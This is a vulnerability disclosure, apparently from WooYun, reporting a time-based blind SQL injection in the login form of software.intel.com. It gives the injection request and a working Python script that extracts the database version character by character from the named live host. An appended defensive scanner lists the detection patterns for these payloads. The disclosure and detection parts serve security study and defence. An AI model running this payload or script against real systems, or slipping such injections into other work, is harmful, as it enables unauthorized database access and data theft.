WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-11-03: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2014-12-18: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
MSSQL blind injection on another Intel subsite. I wrote a short verification script.
Injection point:
POST https://software.intel.com/en-us/user/login
form_build_id=form-koPSRbAyaPXexmNEmu5Spug7HZzMimS28Q4IEcDY-6o&form_id=user_login&name=fasfa')); if (ascii(substring(@@version,1,1))!=1) waitfor delay '0:0:13' -- &op=Log in&pass=fasdfas
The name parameter is injectable (time-based blind injection: the login form delays its response when the injected condition is true).
SQL Server version: Mirosoft SQL Server 2005 - 9
Script attached:
# Python 2 script (httplib / urllib / print statement).
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Candidate characters tried for each position of @@version
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

print 'Try to retrieve SQL Server Version:'
user = ''
for i in range(1, 30, 1):
    for payload in payloads:
        timeout_count = 0
        for j in range(1, 3):
            try:
                conn = httplib.HTTPSConnection('software.intel.com', timeout=5)
                params = {
                    'form_build_id': 'form-koPSRbAyaPXexmNEmu5Spug7HZzMimS28Q4IEcDY-6o',
                    'form_id': 'user_login',
                    'name': "fasfa')); if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload)),
                    'op': 'Log in',
                    'pass': 'fasfasd',
                }
                start_time = time.time()
                conn.request(method='POST', url='/en-us/user/login', body=urllib.urlencode(params), headers=headers)
                conn.getresponse()
                conn.close()
                break
            except:
                # The client timeout (5 s) is not longer than the WAITFOR delay,
                # so a timed-out request is taken as "guessed character matched".
                timeout_count += 1
                if timeout_count == 2:  # 2 times to confirm
                    user += payload
                    sys.stdout.write('\r[In Progress] ' + user)
                    sys.stdout.flush()
                    break
print '\n[Done], SQL Server version is', user
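Added here as a defender-side illustration, not part of the original report: a small scanner over form POST bodies that flags the MSSQL time-based blind injection markers used in the request above (quote/parenthesis breakout, ascii(substring(@@version, ...)), WAITFOR DELAY). The sample request bodies are constructed for this example; the login path and parameter names mirror the report.

```python
import re
import urllib.parse

# Constructed sample requests (request line, URL-encoded body) as a WAF or
# access-log pipeline would see them. Only the second one is malicious.
SAMPLE_REQUESTS = [
    ("POST /en-us/user/login",
     "form_id=user_login&name=alice&op=Log+in&pass=hunter2"),
    ("POST /en-us/user/login",
     "form_id=user_login&name=fasfa%27%29%29%3B+if+%28ascii%28substring%28"
     "%40%40version%2C1%2C1%29%29%21%3D1%29+waitfor+delay+%270%3A0%3A13%27+--+"
     "&op=Log+in&pass=x"),
    ("POST /en-us/user/login",
     "form_id=user_login&name=o%27brien&op=Log+in&pass=x"),   # legitimate apostrophe
]

# Markers characteristic of MSSQL time-based blind injection, matched on the
# decoded, whitespace-normalised parameter value.
MSSQL_TIME_PATTERNS = [
    re.compile(r"waitfor\s+delay", re.I),
    re.compile(r"@@version", re.I),
    re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I),
]
# A closing quote, optional closing parentheses, then a statement terminator:
# the "')); " breakout used in the report's payload.
BREAKOUT = re.compile(r"['\"]\s*\)*\s*;")


def normalise(value):
    # Collapse runs of whitespace so "waitfor   delay" still matches.
    return re.sub(r"\s+", " ", value)


def scan_body(body):
    """Return [(param, [reasons])] for parameters that look injected."""
    findings = []
    for param, value in urllib.parse.parse_qsl(body, keep_blank_values=True):
        text = normalise(value)
        reasons = [p.pattern for p in MSSQL_TIME_PATTERNS if p.search(text)]
        if BREAKOUT.search(text):
            reasons.append("quote-breakout")
        if reasons:
            findings.append((param, reasons))
    return findings


def scan_requests(requests):
    """Return [(request_line, findings)] for requests with at least one finding."""
    return [(line, scan_body(body)) for line, body in requests if scan_body(body)]
```

A plain apostrophe in a name does not trigger the breakout rule, so ordinary users such as "o'brien" are not flagged; the markers here are signature-based and complement, rather than replace, parameterised queries on the server side.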
Parameter filtering
Unable to contact the vendor, or the vendor actively refused.